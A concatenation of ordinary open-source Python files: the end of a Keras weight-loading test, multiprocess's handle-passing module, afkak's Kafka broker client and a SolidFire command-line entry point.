model.save_weights(prefix)
for v in model.variables:
self.evaluate(
v.assign(random_ops.random_normal(shape=array_ops.shape(v))))
self.addCleanup(shutil.rmtree, temp_dir)
second_model = second_model_fn()
second_model.load_weights(prefix)
second_model(x)
self.evaluate(restore_init_fn(second_model))
second_model.save_weights(prefix)
# Check that the second model's checkpoint loads into the original model
model.load_weights(prefix)
y = self.evaluate(model(x))
self.assertAllClose(ref_y, y)
@test_util.run_in_graph_and_eager_modes
def test_weight_loading_graph_model_added_layer(self):
def _save_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3, name='first')(a)
b = keras.layers.Dense(1, name='second')(x)
return keras.models.Model(a, b)
def _restore_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3, name='first')(a)
y = keras.layers.Dense(1, name='second')(x)
b = keras.layers.Dense(3, name='secondjr')(y)
return keras.models.Model(a, b)
def _restore_init_fn(restore_model):
return [v.initializer for v in restore_model.layers[-1].variables]
self._new_layer_weight_loading_test_template(
_save_graph_model, _restore_graph_model,
_restore_init_fn)
@test_util.run_in_graph_and_eager_modes
def test_weight_loading_graph_model_added_no_weight_layer(self):
def _save_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3, name='first')(a)
b = keras.layers.Dense(1, name='second')(x)
return keras.models.Model(a, b)
def _restore_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3, name='first')(a)
y = keras.layers.Dropout(rate=0.1)(x)
b = keras.layers.Dense(1, name='second')(y)
return keras.models.Model(a, b)
def _restore_init_fn(restore_model):
del restore_model # unused
return []
self._new_layer_weight_loading_test_template(
_save_graph_model, _restore_graph_model,
_restore_init_fn)
@test_util.run_in_graph_and_eager_modes
def test_weight_loading_subclassed_model_added_layer(self):
class SubclassedModelRestore(training.Model):
def __init__(self):
super(SubclassedModelRestore, self).__init__()
self.x_layer = keras.layers.Dense(3)
self.y_layer = keras.layers.Dense(3)
self.b_layer = keras.layers.Dense(1)
def call(self, a):
return self.b_layer(self.y_layer(self.x_layer(a)))
def _restore_init_fn(restore_model):
return [v.initializer for v in restore_model.y_layer.variables]
self._new_layer_weight_loading_test_template(
SubclassedModel, SubclassedModelRestore,
_restore_init_fn)
if __name__ == '__main__':
test.main()
|
|
#
# Module to allow connection and socket objects to be transferred
# between processes
#
# multiprocessing/reduction.py
#
# Copyright (c) 2006-2008, R Oudkerk
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of author nor the names of any contributors may be
# used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
#
__all__ = []
import os
import sys
import socket
import threading
import _multiprocess as _multiprocessing
from multiprocess import current_process
from multiprocess.forking import Popen, duplicate, close, ForkingPickler
from multiprocess.util import register_after_fork, debug, sub_debug
from multiprocess.connection import Client, Listener
#
#
#
if not(sys.platform == 'win32' or hasattr(_multiprocessing, 'recvfd')):
raise ImportError('pickling of connections not supported')
#
# Platform specific definitions
#
if sys.platform == 'win32':
import _subprocess
from _multiprocess import win32
def send_handle(conn, handle, destination_pid):
process_handle = win32.OpenProcess(
win32.PROCESS_ALL_ACCESS, False, destination_pid
)
try:
new_handle = duplicate(handle, process_handle)
conn.send(new_handle)
finally:
close(process_handle)
def recv_handle(conn):
return conn.recv()
else:
def send_handle(conn, handle, destination_pid):
_multiprocessing.sendfd(conn.fileno(), handle)
def recv_handle(conn):
return _multiprocessing.recvfd(conn.fileno())
#
# Support for a per-process server thread which caches pickled handles
#
_cache = set()
def _reset(obj):
global _lock, _listener, _cache
for h in _cache:
close(h)
_cache.clear()
_lock = threading.Lock()
_listener = None
_reset(None)
register_after_fork(_reset, _reset)
def _get_listener():
global _listener
if _listener is None:
_lock.acquire()
try:
if _listener is None:
debug('starting listener and thread for sending handles')
_listener = Listener(authkey=current_process().authkey)
t = threading.Thread(target=_serve)
t.daemon = True
t.start()
finally:
_lock.release()
return _listener
def _serve():
from .util import is_exiting, sub_warning
while 1:
try:
conn = _listener.accept()
handle_wanted, destination_pid = conn.recv()
_cache.remove(handle_wanted)
send_handle(conn, handle_wanted, destination_pid)
close(handle_wanted)
conn.close()
except:
if not is_exiting():
import traceback
sub_warning(
'thread for sharing handles raised exception :\n' +
'-'*79 + '\n' + traceback.format_exc() + '-'*79
)
#
# Functions to be used for pickling/unpickling objects with handles
#
def reduce_handle(handle):
if Popen.thread_is_spawning():
return (None, Popen.duplicate_for_child(handle), True)
dup_handle = duplicate(handle)
_cache.add(dup_handle)
sub_debug('reducing handle %d', handle)
return (_get_listener().address, dup_handle, False)
def rebuild_handle(pickled_data):
address, handle, inherited = pickled_data
if inherited:
return handle
sub_debug('rebuilding handle %d', handle)
conn = Client(address, authkey=current_process().authkey)
conn.send((handle, os.getpid()))
new_handle = recv_handle(conn)
conn.close()
return new_handle
#
# Register `_multiprocessing.Connection` with `ForkingPickler`
#
def reduce_connection(conn):
rh = reduce_handle(conn.fileno())
return rebuild_connection, (rh, conn.readable, conn.writable)
def rebuild_connection(reduced_handle, readable, writable):
handle = rebuild_handle(reduced_handle)
return _multiprocessing.Connection(
handle, readable=readable, writable=writable
)
ForkingPickler.register(_multiprocessing.Connection, reduce_connection)
#
# Register `socket.socket` with `ForkingPickler`
#
def fromfd(fd, family, type_, proto=0):
s = socket.fromfd(fd, family, type_, proto)
if s.__class__ is not socket.socket:
s = socket.socket(_sock=s)
return s
def reduce_socket(s):
reduced_handle = reduce_handle(s.fileno())
return rebuild_socket, (reduced_handle, s.family, s.type, s.proto)
def rebuild_socket(reduced_handle, family, type_, proto):
fd = rebuild_handle(reduced_handle)
_sock = fromfd(fd, family, type_, proto)
close(fd)
return _sock
ForkingPickler.register(socket.socket, reduce_socket)
#
# Register `_multiprocessing.PipeConnection` with `ForkingPickler`
#
if sys.platform == 'win32':
def reduce_pipe_connection(conn):
rh = reduce_handle(conn.fileno())
return rebuild_pipe_connection, (rh, conn.readable, conn.writable)
def rebuild_pipe_connection(reduced_handle, readable, writable):
handle = rebuild_handle(reduced_handle)
return _multiprocessing.PipeConnection(
handle, readable=readable, writable=writable
)
ForkingPickler.register(_multiprocessing.PipeConnection, reduce_pipe_connection)
|
|
# -*- coding: utf-8 -*-
# Copyright 2015 Cyan, Inc.
# Copyright 2017, 2018, 2019, 2021 Ciena Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""KafkaBrokerClient and private _Request classes.
Low level network client for the Apache Kafka Message Broker.
"""
import logging
import reprlib
from collections import OrderedDict
from datetime import datetime
from functools import partial
import attr
from twisted.internet.defer import Deferred, fail, maybeDeferred
from twisted.internet.protocol import ClientFactory
from twisted.internet.task import deferLater
from twisted.python.failure import Failure
from ._protocol import KafkaProtocol
from .common import ClientError, DuplicateRequestError
from .kafkacodec import KafkaCodec, _ReprRequest
log = logging.getLogger(__name__)
log.addHandler(logging.NullHandler())
MAX_RECONNECT_DELAY_SECONDS = 15
INIT_DELAY_SECONDS = 0.1
@attr.s(slots=True)
class _RequestState(object):
"""
Private helper class to hold flags about in-flight requests.
:ivar int correlationId: Unique-per-connection ID number for the request.
:ivar bytes request: Serialized Kafka PDU, less the length prefix.
:ivar bool expectResponse:
Is a response expected for this request? If not, it will be discarded
once it has been written to the protocol.
:ivar datetime queued:
When was `_KafkaBrokerClient.makeRequest()` called?
:ivar datetime sent:
When was this request written to a connection? `None` if that hasn't
happened yet. A request that hasn't been written will be discarded
immediately (never sent) when cancelled.
:ivar datetime cancelled:
When was the deferred for this request canceled? `None` if it hasn't
been. The queue entry for a cancelled request is kept around if it has
been sent so that the response correlation logic can differentiate
between responses that were too late vs. responses to requests that
were never sent.
"""
correlationId = attr.ib()
request = attr.ib(repr=False)
expectResponse = attr.ib()
d = attr.ib()
queued = attr.ib()
sent = attr.ib(default=None)
cancelled = attr.ib(default=None)
_aLongerRepr = reprlib.Repr()
_aLongerRepr.maxother = 1024 # bytes is not str, counts as "other"
class _KafkaBrokerClient(ClientFactory):
"""
The low-level client which handles transport to a single Kafka broker.
The KafkaBrokerClient object is responsible for maintaining a connection to
a single Kafka broker, reconnecting as needed, over which it sends requests
and receives responses. Callers make requests with :py:method:`makeRequest`
"""
protocol = KafkaProtocol
# Reduce log spam from twisted
noisy = False
def __init__(self, reactor, endpointFactory, brokerMetadata, clientId,
retryPolicy):
"""
Create a client for a specific broker
The broker client connects to the broker as needed to handle requests.
Requests are retried when the connection fails before the client
receives the response. Requests can be cancelled at any time.
:param reactor: Twisted reactor to use for connecting and when scheduling
delayed calls.
:param endpointFactory:
Callable that accepts (reactor, host, port) as arguments and
returns an IStreamClientEndpoint to use to connect to the broker.
:param BrokerMetadata brokerMetadata:
Broker node ID, host, and port. This may be updated later by
calling updateMetadata().
:param str clientId: Identifying string for log messages. NOTE: not the
ClientId in the RequestMessage PDUs going over the wire.
"""
self._reactor = reactor # ReconnectingClientFactory uses self.clock.
self._endpointFactory = endpointFactory
self.node_id = brokerMetadata.node_id
self.host = brokerMetadata.host
self.port = brokerMetadata.port
self.clientId = clientId
self._retryPolicy = retryPolicy
# No connector until we try to connect
self.connector = None
# The protocol object for the current connection
self.proto = None
# ordered dict of _Requests, keyed by requestId
self.requests = OrderedDict()
# deferred which fires when the close() completes
self._dDown = None
def __repr__(self):
"""return a string representing this KafkaBrokerClient."""
return '_KafkaBrokerClient<node_id={} {}:{} {}>'.format(
self.node_id,
self.host,
self.port,
'connected' if self.connected() else 'unconnected',
)
def updateMetadata(self, new):
"""
Update the metadata stored for this broker.
Future connections made to the broker will use the host and port
defined in the new metadata. Any existing connection is not dropped,
however.
:param new:
:clas:`afkak.common.BrokerMetadata` with the same node ID as the
current metadata.
"""
if self.node_id != new.node_id:
raise ValueError("Broker metadata {!r} doesn't match node_id={}".format(new, self.node_id))
self.node_id = new.node_id
self.host = new.host
self.port = new.port
def makeRequest(self, correlationId, request, expectResponse=True):
"""
Send a request to this broker.
The request may not be sent immediately, but it should be sent soon.
A connection to the broker is created when the first request is made.
Each request is sent at most once per broker connection. If the
connection drops while requests are outstanding then requests are
resent upon reconnection in the order originally issued.
This method returns a deferred that fires with the `bytes` of the
broker response. It may fail in a few ways:
- With `ClientError` when the `_KafkaBrokerClient` is closed.
- With `twisted.internet.defer.CancelledError` if its :meth:`cancel()
<twisted.internet.defer.Deferred.cancel>`_ method is called.
- With some other exception in the case of bugs.
Cancelling the deferred _may_ prevent the request from being sent to
a broker.
:param int correlationId:
ID number used to match responses with requests. This must match
the number embedded in *request*.
:param bytes request:
The serialized request PDU (not including the length prefix).
:parma bool expectResponse:
Will the Kafka broker send a response? Unsetting this flag changes
the result:
- The request is considered sent as soon as it has been enqueued
for write to a connection. It will never be resent, and will be
lost if the connection drops before the broker processes it.
- The returned deferred will fire with `None` instead of
a response.
:returns: Deferred that fires when the request has been processed
:raises DuplicateRequestError: when *correlationId* is reused. This
represents a programming error on the caller's part.
"""
if correlationId in self.requests:
# Id is duplicate to 'in-flight' request. Reject it, as we
# won't be able to properly deliver the response(s)
# Note that this won't protect against a client calling us
# twice with the same ID, but first with expectResponse=False
# But that's pathological, and the only defense is to track
# all requestIds sent regardless of whether we expect to see
# a response, which is effectively a memory leak...
raise DuplicateRequestError('Reuse of correlationId={}'.format(correlationId))
# If we've been told to shutdown (close() called) then fail request
if self._dDown:
return fail(ClientError("Broker client for node_id={} {}:{} has been closed".format(
self.node_id, self.host, self.port)))
# Ok, we are going to save/send it, create a _Request object to track
self.requests[correlationId] = tReq = _RequestState(
correlationId,
request,
expectResponse,
d=Deferred(partial(self._cancelRequest, correlationId)),
queued=datetime.utcfromtimestamp(self._reactor.seconds()),
)
# Do we have a connection over which to send the request?
if self.proto:
# Send the request
# TODO: Flow control
self._sendRequest(tReq)
# Have we not even started trying to connect yet? Do so now
elif not self.connector:
self._connect()
return tReq.d
def disconnect(self):
"""
Disconnect from the Kafka broker.
This is used to implement disconnection on timeout as a workaround for
Kafka connections occasionally getting stuck on the server side under
load. Requests are not cancelled, so they will be retried.
"""
if self.proto:
log.debug('%r Disconnecting from %r', self, self.proto.transport.getPeer())
self.proto.transport.loseConnection()
def close(self):
"""Permanently dispose of the broker client.
This terminates any outstanding connection and cancels any pending
requests.
"""
log.debug('%r: close() proto=%r connector=%r', self, self.proto, self.connector)
assert self._dDown is None
self._dDown = Deferred()
if self.proto is not None:
self.proto.transport.loseConnection()
elif self.connector is not None:
def connectingFailed(reason):
"""
Handle the failure resulting from cancellation.
:reason: a `Failure`, most likely a cancellation error (but
that's not guaranteed).
:returns: `None` to handle the failure
"""
log.debug('%r: connection attempt has been cancelled: %r', self, reason)
self._dDown.callback(None)
self.connector.addErrback(connectingFailed)
self.connector.cancel()
else:
# Fake a cleanly closing connection
self._dDown.callback(None)
try:
raise ClientError("Broker client for node_id={} {}:{} was closed".format(
self.node_id, self.host, self.port))
except Exception:
reason = Failure()
# Cancel any requests
while self.requests:
correlationId, tReq = self.requests.popitem(True)
if tReq.cancelled is None:
tReq.d.errback(reason)
return self._dDown
def connected(self):
"""Are we connected to a Kafka broker?"""
return self.proto is not None
def _connectionLost(self, reason):
"""Called when the protocol connection is lost
- Log the disconnection.
- Mark any outstanding requests as unsent so they will be sent when
a new connection is made.
- If closing the broker client, mark completion of that process.
:param reason:
Failure that indicates the reason for disconnection.
"""
log.info('%r: Connection closed: %r', self, reason)
# Reset our proto so we don't try to send to a down connection
self.proto = None
# Mark any in-flight requests as unsent, discard cancelled requests.
for tReq in list(self.requests.values()):
if tReq.cancelled is not None:
del self.requests[tReq.correlationId]
else:
tReq.sent = None
if self._dDown:
self._dDown.callback(None)
elif self.requests:
self._connect()
def handleResponse(self, response):
"""Handle the response string received by KafkaProtocol.
Ok, we've received the response from the broker. Find the requestId
in the message, lookup & fire the deferred with the response.
"""
correlationId = KafkaCodec.get_response_correlation_id(response)
# Protect against responses coming back we didn't expect
tReq = self.requests.pop(correlationId, None)
if tReq is None:
# The broker sent us a response to a request we didn't make.
log.error('Unexpected response with correlationId=%d: %s',
correlationId, _aLongerRepr.repr(response))
elif tReq.cancelled is not None:
now = datetime.utcfromtimestamp(self._reactor.seconds())
log.debug(
'Response to %s arrived %s after it was cancelled (%d bytes)',
_ReprRequest(tReq.request),
now - tReq.cancelled,
len(response),
)
else:
tReq.d.callback(response)
# # Private Methods # #
def _sendRequest(self, tReq):
"""Send a single request over our protocol to the Kafka broker."""
try:
tReq.sent = datetime.utcfromtimestamp(self._reactor.seconds())
self.proto.sendString(tReq.request)
except Exception as e:
log.exception('%r: Failed to send request %r', self, tReq)
del self.requests[tReq.correlationId]
tReq.d.errback(e)
else:
if not tReq.expectResponse:
# Once we've sent a request for which we don't expect a reply,
# we're done, remove it from requests, and fire the deferred
# with 'None', since there is no reply to be expected
del self.requests[tReq.correlationId]
tReq.d.callback(None)
def _sendQueued(self):
"""Connection just came up, send the unsent requests."""
for tReq in list(self.requests.values()): # must copy, may del
if tReq.sent is None:
self._sendRequest(tReq)
def _cancelRequest(self, correlationId, deferred):
"""
The ``cancel()`` method of a deferred returned by :meth:`makeRequest()`
was called. If the request hasn't been sent, remove it from the queue.
Otherwise it is flagged as cancelled so it won't be resent. The
queue table entry is retained so if a response comes we don't log an
error.
"""
tReq = self.requests[correlationId]
if tReq.sent is not None:
tReq.cancelled = datetime.utcfromtimestamp(self._reactor.seconds())
else:
del self.requests[correlationId]
def _abortRequest(self, correlationId, reason):
"""
Remove a request from the queue and fail its deferred.
:param int correlationId: Request ID
:param reason: :class:`twisted.python.failure.Failure` instance to
errback the request deferred with
"""
tReq = self.requests.pop(correlationId)
tReq.d.errback(reason)
def _connect(self):
"""Connect to the Kafka Broker
This routine will repeatedly try to connect to the broker (with backoff
according to the retry policy) until it succeeds.
"""
def tryConnect():
self.connector = d = maybeDeferred(connect)
d.addCallback(cbConnect)
d.addErrback(ebConnect)
def connect():
endpoint = self._endpointFactory(self._reactor, self.host, self.port)
log.debug('%r: connecting with %s', self, endpoint)
return endpoint.connect(self)
def cbConnect(proto):
log.debug('%r: connected to %r', self, proto.transport.getPeer())
self._failures = 0
self.connector = None
self.proto = proto
if self._dDown:
proto.transport.loseConnection()
else:
self._sendQueued()
def ebConnect(fail):
if self._dDown:
log.debug('%r: breaking connect loop due to %r after close()', self, fail)
return fail
self._failures += 1
delay = self._retryPolicy(self._failures)
log.debug('%r: failure %d to connect -> %s; retry in %.2f seconds.',
self, self._failures, fail.value, delay)
self.connector = d = deferLater(self._reactor, delay, lambda: None)
d.addCallback(cbDelayed)
def cbDelayed(result):
tryConnect()
self._failures = 0
tryConnect()
|
|
import logging
import logging.config
import os
import sys
import click
import click.core
import click.testing
import copy
import csv
import pkg_resources
from pkg_resources import Requirement, resource_filename
import struct
import base64
logging.basicConfig(
level=logging.WARNING,
format=('%(asctime)s - %(name)s: in %(filename)s at %(lineno)s - %(levelname)s: %(message)s'))
LOG = logging.getLogger(__name__)
CONTEXT_SETTINGS = dict(auto_envvar_prefix='SOLIDFIRE', token_normalize_func=lambda x: x.lower())
HELP_STRING = """Welcome to the SolidFire Command Line Interface """ + pkg_resources.require("solidfire-cli")[0].version + """.
For more information about how to use this, see the readme here: https://github.com/solidfire/solidfire-cli."""
DEBUG_LOGGING_MAP = {
0: logging.CRITICAL,
1: logging.WARNING,
2: logging.INFO,
3: logging.DEBUG
}
CLI_VERSION = 'v1'
click.disable_unicode_literals_warning = True
class Context():
def __init__(self):
self.logger = None
self.verbose = False
self.home = os.getcwd()
self.connections = dict()
self.element = None
self.depth = None
self.json = None
self.pickle = None
self.filter_tree = None
self.table = None
self.verifyssl = None
self.timeout = 30
self.nocache = None
def log(self, msg, *args):
"""Logs a message to stderr."""
if args:
msg %= args
click.echo(msg, file=sys.stderr)
def vlog(self, msg, *args):
"""Logs a message to stderr only if verbose is enabled."""
if self.verbose:
self.log(msg, *args)
pass_context = click.make_pass_decorator(Context, ensure=True)
cmd_folder = os.path.abspath(os.path.join(os.path.dirname(__file__),
'commands'))
class SolidFireCLI(click.MultiCommand):
def list_commands(self, ctx):
rv = []
for filename in os.listdir(cmd_folder):
if filename.endswith('.py') and \
filename.startswith('cmd_'):
rv.append(filename[4:-3])
rv.sort()
return rv
def get_command(self, ctx, name):
try:
if sys.version_info[0] == 2:
name = name.encode('ascii', 'replace')
import_string = (
"element.cli.commands.cmd_%s" % (name.lower()))
mod = __import__(import_string, None, None, ['cli'])
except ImportError as e:
LOG.error(name.lower()+" is not a valid module. Please run 'sfcli --help' for a list of valid modules.")
exit(1)
return mod.cli
class SolidFireParsingState(click.parser.ParsingState):
def __init__(self, args):
self.subparameters = []
click.parser.ParsingState.__init__(self, args)
class SolidFireParser(click.parser.OptionParser):
# We overrided this guy because we needed to inject our custom parsing
# state parameter into the native ParsingState. Other than that, the
# logic is all the same.
def parse_args(self, args):
"""Parses positional arguments and returns ``(values, args, order)``
for the parsed options and arguments as well as the leftover
arguments if there are any. The order is a list of objects as they
appear on the command line. If arguments appear multiple times they
will be memorized multiple times as well.
"""
state = SolidFireParsingState(args)
try:
self._process_args_for_options(state)
self._process_args_for_args(state)
except click.parser.UsageError:
if self.ctx is None or not self.ctx.resilient_parsing:
raise
return state.opts, state.largs, state.order
# Basically, this is the thing we're overriding. Typically, this function will
# consume the array of arguments that come directly from the user. What I'm
# doing is adding in the subparameters as null whenever they are not provided
# by the user.
def _match_long_opt(self, opt, explicit_value, state):
option = self._long_opt.get(opt, None)
if option != None:
if type(option.obj) == SolidFireOption and\
option.obj.is_sub_parameter and\
opt[2:] not in state.subparameters:
raise click.parser.BadOptionUsage(opt+" is a subparameter and cannot be provided in this context.")
if state.subparameters != [] and opt[2:] not in state.subparameters:
# If we find out that there were some options we were expecting
# that didn't show up, we account for them by setting them to
# none here, pushing them into the state machine, and returning.
# We'll process them in the next iteration.
extraParams = []
for paramName in state.subparameters:
extraParams.append("--"+paramName)
extraParams.append("")
extraParams.append(opt)
state.rargs = extraParams + state.rargs
return
# If we've gotten here, it implies that we are either handling
# an expected subparameter (ie opt[2:] in state.subparameters)
# or we're handling a regular parameter (ie state.subparameters=[])
# If it is a subparameter,
# First, remove it from the expected subparameters list because
# we found it!
if opt[2:] in state.subparameters:
state.subparameters.remove(opt[2:])
# Now, one way or another, we process it.
# This kicks us out with an error if option=None. Hence, everything
# following definitely has an option.
click.OptionParser._match_long_opt(self, opt, explicit_value, state)
# Finally, if this is a regular parameter, there is a chance it has
# subparameters we need to expect. We add them to the state machine
# here. These will be expected in the next iteration. Note well, by
# the time we're handling regular parameters, state.subparameters=[].
if state.subparameters == [] and type(option.obj) == SolidFireOption:
state.subparameters = copy.deepcopy(option.obj.subparameters)
# This is the edge case: If we've run out of rargs
# but we still are expecting some subparams, empty
# them into rargs now.
if state.rargs == [] and state.subparameters != []:
for paramName in state.subparameters:
state.rargs.append("--" + paramName)
state.rargs.append("")
class SolidFireOption(click.core.Option):
def __init__(self, param_decls=None, subparameters=[], is_sub_parameter=False, *args, **kwargs):
self.subparameters = subparameters # This is simply a list of names that depend on our given param.
self.is_sub_parameter = is_sub_parameter
if is_sub_parameter and subparameters != []:
raise click.BadParameter("An option cannot be both a super parameter and a subparameter.")
click.core.Option.__init__(self, param_decls, *args, **kwargs)
def type_cast_value(self, ctx, value):
"""Given a value this runs it properly through the type system.
This automatically handles things like `nargs` and `multiple` as
well as composite types.
"""
if self.type.is_composite:
if self.nargs <= 1:
raise TypeError('Attempted to invoke composite type '
'but nargs has been set to %s. This is '
'not supported; nargs needs to be set to '
'a fixed value > 1.' % self.nargs)
if self.multiple:
return tuple(self.type(x or (), self, ctx) for x in value or ())
return self.type(value or (), self, ctx)
def _convert(value, level):
if level == 0:
if value == "":
#if self.required and self.is_sub_parameter:
# raise click.BadParameter(self.name+" is a required member of its parameter group. Please provide it inline after the associated superparameter.")
return None
return self.type(value, self, ctx)
return tuple(_convert(x, level - 1) for x in value or ())
v = _convert(value, (self.nargs != 1) + bool(self.multiple))
return _convert(value, (self.nargs != 1) + bool(self.multiple))
class SolidFireCommand(click.Command):
def make_parser(self, ctx):
"""Creates the underlying option parser for this command."""
parser = SolidFireParser(ctx)
parser.allow_interspersed_args = ctx.allow_interspersed_args
parser.ignore_unknown_options = ctx.ignore_unknown_options
for param in self.get_params(ctx):
param.add_to_parser(parser, ctx)
return parser
"""
SDK1.6 Note:
since print_tree output is not supported in SDK 1.6
depth and filter_tree params are removed from --help as they shold not be used.
"""
@click.command(cls=SolidFireCLI, context_settings=CONTEXT_SETTINGS, help=HELP_STRING)
@click.option('--mvip', '-m',
default=None,
help="SolidFire MVIP.",
required=False)
@click.option('--username', '-u',
default=None,
help="SolidFire Cluster username.",
required=False)
@click.option('--password', '-p',
default=None,
help="SolidFire cluster password.",
required=False)
@click.option('--version', '-v',
default=None,
help='The version you would like to connect on.',
required=False)
@click.option('--port', '-q',
default=443,
help="The port number on which you wish to connect.",
required=False)
@click.option('--name', '-n',
default = None,
help="The name of the connection you wish to use in connections.csv. You can use this if you have previously stored away a connection with 'sfcli connection push'.",
required=False)
@click.option('--connectionIndex', '-c',
default=None,
type=click.INT,
help="The index of the connection you wish to use in connections.csv. You can use this if you have previously stored away a connection with 'sfcli connection push'.",
required=False)
@click.option('--verifyssl', '-s',
default = False,
help="Enable this to check ssl connection for errors especially when using a hostname. It is invalid to set this to true when using an IP address in the target.",
required=False,
is_flag=True)
@click.option('--timeout', '-t',
default=30,
help="The request timeout in seconds.",
required=False)
@click.option('--json', '-j',
is_flag=True,
required=False,
help="To print the full output in json format, use this flag.")
@click.option('--pickle', '-k',
is_flag=True,
required=False,
help="To print the full output in a pickled json format, use this flag.")
@click.option('--debug',
required=False,
default="1",
help="Set the debug level",
type=click.Choice(sorted([str(key) for key
in DEBUG_LOGGING_MAP.keys()])))
@click.option('--nocache',
required=False,
is_flag=True,
help="If you do not wish to cache the connection, supply this flag.")
@pass_context
def cli(ctx,
mvip=None,
username=None,
password=None,
name=None,
port=None,
verifyssl=False,
timeout=30,
connectionindex=None,
json=None,
pickle=None,
depth=None,
filter_tree=None,
debug=0,
verbose=0,
version=None,
nocache=None):
"""Welcome to the SolidFire command line interface! For more information about how to use this, see the readme here: https://github.com/solidfire/solidfire-cli"""
# NOTE(jdg): This method is actually our console entry point,
# if/when we introduce a v2 of the shell and client, we may
# need to define a new entry point one level up that parses
# out what version we want to uses
ctx.debug = debug
LOG.setLevel(DEBUG_LOGGING_MAP[int(debug)])
element_logger = logging.getLogger('solidfire.Element')
element_logger.setLevel(DEBUG_LOGGING_MAP[int(debug)])
for h in element_logger.handlers:
element_logger.removeHandler(h)
#if element_logger.hasHandlers():
# element_logger.handlers.clear()
ctx.logger = LOG
ctx.verbose = verbose
ctx.username = username
ctx.password = password
ctx.name = name
ctx.port = port
ctx.connectionindex = connectionindex
ctx.mvip = mvip
ctx.json = json
ctx.pickle = pickle
"""
SDK1.6 Note:
since print_tree output is not supported in SDK 1.6
changing these two fields to None as they shold not be used.
"""
ctx.depth = None
ctx.filter_tree = None
ctx.verifyssl = verifyssl
ctx.timeout = timeout
ctx.version = version
ctx.nocache = nocache
if __name__ == '__main__':
"""
#pass_context()
#ctx = click.globals.get_current_context()
runner = click.testing.CliRunner()
runner.invoke(element_cli.cli,
["account", "list"])
runner.invoke(element_cli.cli,
['--mvip', "10.117.61.44", "--login", "admin", "--password", "admin", "--name", "b", "Connection",
"PushConnection"])"""
cli.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.